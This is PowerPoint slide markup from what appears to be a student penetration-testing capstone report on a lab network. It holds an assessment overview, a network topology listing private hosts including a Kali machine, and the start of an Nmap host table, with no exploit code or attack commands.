            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA4586C6-9B4E-43ED-9C4F-82EC3B826917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On April 22, 2021 an assessment of the Capstone network was conducted. The purpose of this assessment was to evaluate any security vulnerabilities that could lead to the Capstone network to be exploited. The objective of the penetration test was the find a hidden flag that was placed in the Capstone file system and to report the findings to the client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first part of the assessment was to initiate a Red Team: Security Assessment on the network to locate the objective. The techniques and processes used during this phase are outlined in this report.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The second part of the assessment was to then conduct a Blue Team: Log Analysis and Attack Characterization.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="139700" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>And finally to make recommendations to Capstone management of proposed alarms and mitigation strategies to lower the risks of the vulnerabilities discovered on their network.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6503965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50"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1051" name="Google Shape;1051;p56"/>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Network Topology </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1052" name="Google Shape;1052;p56"/>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4</a:t>
            </a:fld>
            <a:endParaRPr sz="6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56"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1057" name="Google Shape;1057;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14530"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="457200" tIns="0" rIns="457200" bIns="914400" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7056300" y="910475"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="182875" tIns="182875" rIns="182875" bIns="182875" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Address Range: 192.168.1.0/24</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Netmask:255.255.225.0</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Gateway: 192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100" dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IPv4:192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Windows</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname:Hypervisor</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IPv4: 192.168.1.100</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: ELK Stack</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IPv4: 192.168.1.105</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: Capstone</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>IPv4: 192.168.1.8</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>OS: Linux</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Hostname: Kali</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>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None/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12425" y="0"/>
            <a:ext cx="6699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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCEA613E-389C-40D0-9573-D9A34869F038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="896312"/>
            <a:ext cx="6699600" cy="4153753"/>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64"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1065" name="Google Shape;1065;p58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="274322" y="289900"/>
            <a:ext cx="8595295" cy="4593614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1066" name="Google Shape;1066;p58"/>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6</a:t>
            </a:fld>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1067" name="Google Shape;1067;p58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="1029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b="1"/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:latin typeface="Roboto Light"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1068" name="Google Shape;1068;p58"/>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72"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1073" name="Google Shape;1073;p59"/>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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1074" name="Google Shape;1074;p59"/>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marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network:</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Roboto Medium"/>
              <a:ea typeface="Roboto Medium"/>
              <a:cs typeface="Roboto Medium"/>
              <a:sym typeface="Roboto Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p59"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1076" name="Google Shape;1076;p59"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4280201312"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{DF0E2E5A-1893-4115-BEBC-C7BC51BD71B3}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2782200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="403225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hostname</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>IP Address</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
                        <a:sym typeface="Roboto"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="182875" marR="18287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rgbClr val="990000"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="793475">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" dirty="0">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Hypervisor</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" dirty="0">
                        <a:latin typeface="Roboto"/>
                        <a:ea typeface="Roboto"/>
                        <a:cs typeface="Roboto"/>
